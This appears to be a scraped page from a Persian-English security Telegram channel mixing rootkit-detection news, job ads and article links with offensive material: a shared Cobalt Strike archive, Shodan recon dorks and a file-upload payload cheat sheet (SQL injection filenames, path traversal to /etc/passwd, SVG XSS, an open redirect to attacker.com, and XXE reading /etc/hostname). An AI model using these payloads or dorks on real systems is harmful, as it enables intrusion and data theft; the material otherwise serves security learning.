Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
⭕️این ابزار که جهت شناسایی و بررسی RootKit ها توسعه داده شده است، با استفاده از درایور ابزار Winpmem که خود نیز قبل تر جزو ابزار Rekall بوده است(اگر Memory Forensics کار کرده باشید احتمالا باهاش آشنا هستید) و مدتی هست بصورت جداگانه توسعه داده شده، اقدام به بررسی موارد خوبی میکند.
یکی از ویژگی هایی که میتوان به آن اشاره کرد امکان متصل کردن به سرور GDB و بررسی فایل مسیر زیر میباشد.
C:\Windows\MEMORY.DMP
خلاصه ی مواردی که این ابزار آنها را بررسی میکند :

Loaded modules list
Drivers in memory code (compared to on-disk version)
Callbacks of kernel objects and internal ntoskrnl lists
PlugAndPlay tree and filters
Kernel types callbacks
FltMgr callbacks
KTimers DPC functions
IRP driver's tables
Driver signing global variables with callbacks
NDIS filters and callbacks
NetIO/FwpkCLNT filtering dispatch
Devices and their attached device objects
IDT entries
PatchGuard initialization and state

#ThreatHunting #RootKit

@Engineer_Computer
This media is not supported in your browser
VIEW IN TELEGRAM
آموزش استفاده از GPT4-o
رایگان
صدرصد

به یک فیلترشکن با ip آمریکا وصل بشید
و به لینک زیر برید

https://openai.com/index/gpt-4o-and-more-tools-to-chatgpt-free/

در شبیه سازی حملات هک بسیار مفید است

It is very useful in simulating hacking attacks

@Engineer_Computer
👍5🎉1
گفتن اینکه حریم خصوصی بی فایده است زیرا چیزی برای پنهان کردن ندارید مانند این است که بگویید آزادی بیان بی فایده است زیرا چیزی برای گفتن ندارید

Saying that privacy is useless because you have nothing to hide is like saying that freedom of speech is useless because you have nothing to say.

@Engineer_Computer
5🔥3👍1
shodan dorks for recon :

1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"

2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"

3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"

4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"

5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"

@Engineer_Computer
👍1
Cobalt_Strike_v4.9.1.7z
68.9 MB
CS491
cobalt strike
یکی از ابزار های بشدت قدرتمند در حوزه رد تیم که نیازه🔥
@Engineer_Computer
#redteam
SOC Threat Intelligence Analyst
Telecommute/home-based, Seeking a SOC Threat Intelligence Analyst for a contract role with a State Government organization in Des Moines, IA. Kindly review and let me know if you are interested in this opportunity. Role: SOC Threat Intelligence Analyst Location: Des Moines, IA - Remote Duration: Contractual Position Summary: This position supports the organization's Security Operations Center (SOC). The purpose of this p

http://jobview.monster.com/SOC-Threat-Intelligence-Analyst-Job-US-275907401.aspx

#US #SOC Threat Intelligence Analyst
@Engineer_Computer
استفاده از درایور های آسیب پذیر ولی امضا دار برای دورزدن کنترل های امنیتی نظیر EDR

مقاله ای خواندنی 👌

https://medium.com/@merasor07/byovd-a-kernel-attack-stealthy-threat-to-endpoint-security-ec809272e505

@Engineer_Computer
مقاله ی صبح شنبه
دیتا مدل های کشف
کاهش خطا در تحلیل های امنیتی

**حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟


https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051

@Engineer_Computer
The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380)
@Engineer_Computer
Chaining Vulnerabilities through File Upload

SLQi
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal
../../etc/passwd/logo.png
../../../logo.png


XSS
->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>


Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>

@Engineer_Computer
⭕️ استفاده از مدل‌های Large Language Models (LLMs) در کشف آسیب پذیری‌ها به شکل چشمگیری امنیت سایبری را متحول می‌کند، با خودکارسازی شناسایی آسیب‌پذیری‌ها، بهبود تحلیل تهدیدها. این مدل‌های پیشرفته، مانند GPT-4، به طور قابل توجهی بهره‌وری را با اسکن سریع کد، Generating Test Cases و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها بهبود می‌بخشند.
توانایی آن‌ها در پردازش و تحلیل حجم عظیمی از داده‌ها به متخصصان امنیت کمک می‌کند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLM‌ها در برنامه‌های Bug Bounty نه تنها شناسایی نقص‌های امنیتی را تسریع می‌کند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت می‌کند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/

The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
👍21